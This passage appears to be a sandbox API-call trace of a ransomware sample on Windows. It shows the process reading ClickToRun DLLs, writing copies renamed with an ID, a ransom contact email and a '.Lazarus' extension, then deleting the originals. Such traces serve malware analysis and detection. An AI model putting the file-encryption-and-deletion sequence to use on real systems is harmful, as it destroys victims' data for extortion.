Size=0x20) returned 0x885b8 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.726] AreFileApisANSI () returned 1 [0089.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0089.726] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.726] AreFileApisANSI () returned 1 [0089.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0089.726] GetLastError () returned 0x0 [0089.726] SetLastError (dwErrCode=0x0) [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0d8 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0089.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0089.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0089.727] GetLastError () returned 0x0 [0089.727] SetLastError (dwErrCode=0x0) [0089.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0089.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0089.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5fb08 [0089.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0089.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.727] AreFileApisANSI () returned 1 [0089.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fb08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0089.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x13c) returned 0x4e568 [0089.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fb08, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=158 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 158 [0089.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.728] GetFileType (hFile=0x418) returned 0x1 [0089.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0089.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.728] AreFileApisANSI () returned 1 [0089.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0089.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0089.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.728] GetFileType (hFile=0x360) returned 0x1 [0089.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0089.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0089.729] GetLastError () returned 0x0 [0089.729] SetLastError (dwErrCode=0x0) [0089.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0089.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.729] GetLastError () returned 0x0 [0089.729] SetLastError (dwErrCode=0x0) [0089.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0089.729] ReadFile (in: hFile=0x360, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0089.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0089.731] GetLastError () returned 0x0 [0089.731] SetLastError (dwErrCode=0x0) [0089.731] GetLastError () returned 0x0 [0089.731] SetLastError (dwErrCode=0x0) [0089.731] GetLastError () returned 0x0 [0089.731] SetLastError (dwErrCode=0x0) [0089.731] GetLastError () returned 0x0 [0089.731] SetLastError (dwErrCode=0x0) [0089.732] ReadFile (in: hFile=0x360, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.732] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.733] GetLastError () returned 0x0 [0089.733] SetLastError (dwErrCode=0x0) [0089.733] GetLastError () returned 0x0 [0089.733] SetLastError (dwErrCode=0x0) [0089.733] GetLastError () returned 0x0 [0089.733] SetLastError (dwErrCode=0x0) [0089.733] GetLastError () returned 0x0 [0089.733] SetLastError (dwErrCode=0x0) [0089.733] ReadFile (in: hFile=0x360, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.733] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.734] GetLastError () returned 0x0 [0089.734] SetLastError (dwErrCode=0x0) [0089.734] GetLastError () returned 0x0 [0089.734] SetLastError (dwErrCode=0x0) [0089.734] GetLastError () returned 0x0 [0089.734] SetLastError (dwErrCode=0x0) [0089.734] GetLastError () returned 0x0 [0089.734] SetLastError (dwErrCode=0x0) [0089.734] ReadFile (in: hFile=0x360, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.734] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.735] GetLastError () returned 0x0 [0089.735] SetLastError (dwErrCode=0x0) [0089.735] GetLastError () returned 0x0 [0089.735] SetLastError (dwErrCode=0x0) [0089.735] GetLastError () returned 0x0 [0089.735] SetLastError (dwErrCode=0x0) [0089.735] GetLastError () returned 0x0 [0089.735] SetLastError (dwErrCode=0x0) [0089.735] ReadFile (in: hFile=0x360, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0xac0, lpOverlapped=0x0) returned 1 [0089.735] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.735] GetLastError () returned 0x0 [0089.736] SetLastError (dwErrCode=0x0) [0089.736] GetLastError () returned 0x0 [0089.736] SetLastError (dwErrCode=0x0) [0089.736] ReadFile (in: hFile=0x360, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.736] GetLastError () returned 0x0 [0089.736] SetLastError (dwErrCode=0x0) [0089.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0089.736] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0xac0, lpOverlapped=0x0) returned 1 [0089.736] GetLastError () returned 0x0 [0089.736] SetLastError (dwErrCode=0x0) [0089.736] GetLastError () returned 0x0 [0089.736] SetLastError (dwErrCode=0x0) [0089.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0089.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0089.737] CloseHandle (hObject=0x418) returned 1 [0089.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.738] CloseHandle (hObject=0x360) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0089.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.738] AreFileApisANSI () returned 1 [0089.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0089.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0089.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.739] GetFileType (hFile=0x360) returned 0x1 [0089.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0089.740] GetLastError () returned 0xb7 [0089.740] SetLastError (dwErrCode=0xb7) [0089.740] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.741] CloseHandle (hObject=0x360) returned 1 [0089.741] AreFileApisANSI () returned 1 [0089.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0089.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0089.741] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0089.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.743] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0x1, dwReserved1=0x202f8, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="AP0479~1.DLL")) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.744] AreFileApisANSI () returned 1 [0089.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 95 [0089.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0089.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 